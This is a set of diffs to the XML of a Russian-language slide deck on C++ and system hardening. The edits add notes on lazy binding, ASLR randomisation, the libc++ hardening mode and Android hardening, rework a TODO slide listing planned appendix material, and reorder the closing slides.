+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide53.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Спасибо за внимание</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Вопросы</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide54.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>TODO</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit lnSpcReduction="10000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Информация о замерах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в приложении</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Какие проверялись версии дистрибутивов</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как считались </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CVE, KEV</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (скрипты</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ссылки на примеры</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (Stack Clashing)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как искать проблемные программы (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>no-pie, etc.)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как запустить бенчмарки </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Отдельный слайд про </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Rust</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (таблица со сравнением)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Отдельный слайд с рекомендуемыми ссылками</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Слайд с рекомендациями</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверить дефолтные опции в дистро, решить с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Security Team </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>какие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardening</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-методы включить в проде</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
       </p:ext>
     </p:extLst>
   </p:cSld>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -14951,7 +14951,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -14985,6 +14985,25 @@
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>содержащую указатели на функции</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Т.н. отложенное связывание </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(lazy binding)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ускоряет запуск приложения</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -16274,7 +16293,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Может только немного замедлить старт приложения из-за необходимости разрешения всех символов</a:t>
+              <a:t>Может только замедлить старт программы из-за необходимости разрешения всех символов</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -16288,6 +16307,30 @@
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>Clang</a:t>
             </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>TODO: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>проверить на </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US"/>
+              <a:t>-DBUILD_SHARED_LIBS</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -77,8 +77,8 @@
     <p:sldId id="329" r:id="rId71"/>
     <p:sldId id="330" r:id="rId72"/>
     <p:sldId id="331" r:id="rId73"/>
-    <p:sldId id="270" r:id="rId74"/>
-    <p:sldId id="271" r:id="rId75"/>
+    <p:sldId id="271" r:id="rId74"/>
+    <p:sldId id="270" r:id="rId75"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -4372,9 +4372,12 @@
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В 32-битных Windows рандомизировалось только 8 (!) бит адреса загрузки</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Небольшое число рандомизируемых битов (16 или даже 8 в 32-битных Windows</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="3"/>
@@ -12507,7 +12510,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -12529,6 +12532,33 @@
             </a:r>
           </a:p>
           <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(дефолтная </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>STL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
               <a:t>Libc</a:t>
@@ -12536,6 +12566,45 @@
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>++: -D_LIBCPP_HARDENING_MODE=...</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включается в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>по флагу </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>stdlib</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>libc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>++)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -18559,7 +18628,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -18715,6 +18784,38 @@
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t> Firefox</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android user</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>- и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>kernelspace</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="sv-SE" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>System hardening in Android 11</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -22235,7 +22336,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -22252,10 +22353,9 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Спасибо за внимание</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>TODO</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -22264,7 +22364,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -22277,24 +22377,150 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit lnSpcReduction="10000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Вопросы</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
-            </a:r>
+              <a:t>Информация о замерах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в приложении</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Какие проверялись версии дистрибутивов</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как считались </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CVE, KEV</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (скрипты</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ссылки на примеры</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (Stack Clashing)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как искать проблемные программы (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>no-pie, etc.)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как запустить бенчмарки </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Отдельный слайд про </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Rust</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (таблица со сравнением)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Отдельный слайд с рекомендуемыми ссылками</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Слайд с рекомендациями</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверить дефолтные опции в дистро, решить с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Security Team </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>какие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardening</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-методы включить в проде</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -22326,7 +22552,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -22343,9 +22569,10 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO</a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Спасибо за внимание</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -22354,7 +22581,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -22367,150 +22594,24 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
-          </a:bodyPr>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Информация о замерах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в приложении</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Какие проверялись версии дистрибутивов</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как считались </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CVE, KEV</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (скрипты</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ссылки на примеры</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (Stack Clashing)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как искать проблемные программы (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>no-pie, etc.)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как запустить бенчмарки </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Отдельный слайд про </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Rust</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (таблица со сравнением)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Отдельный слайд с рекомендуемыми ссылками</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Слайд с рекомендациями</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверить дефолтные опции в дистро, решить с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Security Team </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>какие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardening</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-методы включить в проде</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Вопросы</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
       </p:ext>
     </p:extLst>
   </p:cSld>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -38,47 +38,48 @@
     <p:sldId id="289" r:id="rId32"/>
     <p:sldId id="290" r:id="rId33"/>
     <p:sldId id="292" r:id="rId34"/>
-    <p:sldId id="293" r:id="rId35"/>
-    <p:sldId id="294" r:id="rId36"/>
-    <p:sldId id="295" r:id="rId37"/>
